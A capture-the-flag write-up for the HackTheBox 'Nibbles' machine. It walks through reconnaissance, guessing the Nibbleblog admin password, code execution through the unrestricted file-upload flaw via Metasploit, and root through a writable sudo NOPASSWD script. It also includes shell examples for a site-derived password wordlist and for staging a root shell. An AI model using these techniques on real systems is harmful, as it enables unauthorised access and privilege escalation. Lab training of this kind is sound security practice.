HTB 6. Nibbles
- 1. Ports 22 and 80 are open, from nmap -A -T4 -p- 10.10.10.75. Typically 80 is the way in and 22 is used later with credentials found on the box; SSH itself is rarely the exploit.
  searchsploit apache 2.4  (look up the Apache version nmap reported)
- 3. Browsing to 10.10.10.75 shows "Hello World" only.
- 4. Viewing the page source reveals 10.10.10.75/nibbleblog/, so the site runs on the Nibbleblog platform.
  searchsploit nibble finds Nibbleblog 4.0.3 arbitrary file upload and remote code execution.
- 6. In Metasploit, info on the module shows we need to be authenticated, so a login is needed first.
  dirbuster to find the login page.
- 8. Could use Burp Suite to brute force usernames and passwords, or just brute force the password with admin as the username. Could also run cewl against the blog posts to build a password list from the words on the site.
- 9. Credentials are admin:nibbles, guessed from the site name.
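As an added example (not from the original notes) of the wordlist idea in step 8: a shell function that does what cewl does in miniature, pulling words out of page content and adding the obvious mutations, so that the site-name guess nibbles falls out of the page itself. The HTML is constructed for the example, not captured from the box; the 4-letter minimum and the suffix list are assumptions.

```shell
#!/bin/bash
# Added example, not from the original notes. Constructed page content standing in for
# what cewl would fetch from the blog (title, heading, first post).
SAMPLE_HTML='<html><head><title>Nibbles - Yum yum</title></head>
<body><h1>Nibbles</h1><p>Powered by Nibbleblog. Hello World!</p></body></html>'

# gen_wordlist HTML
#   strip tags, split on non-letters, lowercase, drop words under 4 letters (assumed
#   minimum, like cewl -m 4), de-duplicate, then emit each word with common mutations:
#   as-is, Capitalised, and with "1" / "123" appended (assumed suffix list).
gen_wordlist() {
  printf '%s' "$1" \
    | sed 's/<[^>]*>/ /g' \
    | tr -cs 'A-Za-z' '\n' \
    | tr 'A-Z' 'a-z' \
    | awk 'length($0) >= 4 && !seen[$0]++ {
             print                                        # word as found
             print toupper(substr($0, 1, 1)) substr($0, 2) # Capitalised
             print $0 "1"; print $0 "123"                  # common suffixes
           }'
}

# Usage: gen_wordlist "$SAMPLE_HTML" > site_words.txt, then feed the list to the
# brute forcer of choice with admin as the username.
```

The point is not the tool but the source of the words: a CMS whose admin password is the site name is found by a list built from the site, not from rockyou.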
- 10. Set the Metasploit module parameters to the username, password, rhosts, and
- 11. This works because of the My Image plugin, which accepts any file type (no extension whitelisting is done), so a PHP file can be uploaded and then executed.
- 13. Searching for privilege escalation. From the Metasploit session:
    shell
    cd /home/nibbler
    ls -la
    cat user.txt
    history
    cat .bash_history
    sudo -l
  sudo -l shows ~/personal/stuff/monitor.sh can be run as root without a password.
- 15. That folder does not exist, so we can create it and place our own shell script at that path.
  personal.zip is also there; potentially try to crack it.
  uname -a prints the full kernel/OS version; potentially search for exploits against that kernel.
  Create the script:
    echo "bash -i" > monitor.sh
    chmod +x monitor.sh
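Putting the privilege escalation together, as an added example that is not from the original notes: a shell snippet that reads the NOPASSWD target out of sudo -l output, creates the missing personal/stuff directory, and drops an executable script there. The sudo -l output below is constructed to match what the notes describe; the optional staging root is an assumption added so the snippet can be dry-run under a scratch directory without sudo. On the box, the last step is sudo /home/nibbler/personal/stuff/monitor.sh.

```shell
#!/bin/bash
# Added example, not from the original notes. Constructed sudo -l output shaped like what
# the notes report for the nibbler user (on the box, use whatever sudo -l actually prints).
SUDO_L_OUTPUT='User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# nopasswd_targets SUDO_L_TEXT
#   Print the command path(s) sudo will run as the listed user without a password.
#   Any of them whose path, or a parent directory, we can write is a root shell.
nopasswd_targets() {
  printf '%s\n' "$1" | sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p'
}

# stage_payload TARGET [ROOT]
#   TARGET is the path from sudo -l. ROOT (assumption for dry-runs) prefixes the path so
#   the whole tree can be staged under a scratch directory; omit it on the box.
#   The directory does not exist yet, so mkdir -p creates it; everything below our
#   writable home is then owned by us, including the script sudo will execute as root.
stage_payload() {
  local target="$1" root="${2:-}"
  local script="${root}${target}"
  mkdir -p "$(dirname "$script")"
  cat > "$script" <<'EOF'
#!/bin/bash
# executed by sudo as root: spawn an interactive shell that keeps root's uid
bash -i
EOF
  chmod +x "$script"   # sudo execs the file, so it needs the execute bit
  printf '%s\n' "$script"
}

# On the target (no ROOT argument), then run the staged script through sudo:
#   target=$(nopasswd_targets "$(sudo -l)")
#   stage_payload "$target"
#   sudo "$target"
```

The shebang is added so the script does not depend on the caller's ENOEXEC fallback. bash -i only gives a usable shell if the session it runs in has a pty; from a bare Meterpreter shell, upgrade to a pty first or swap the body for a reverse shell.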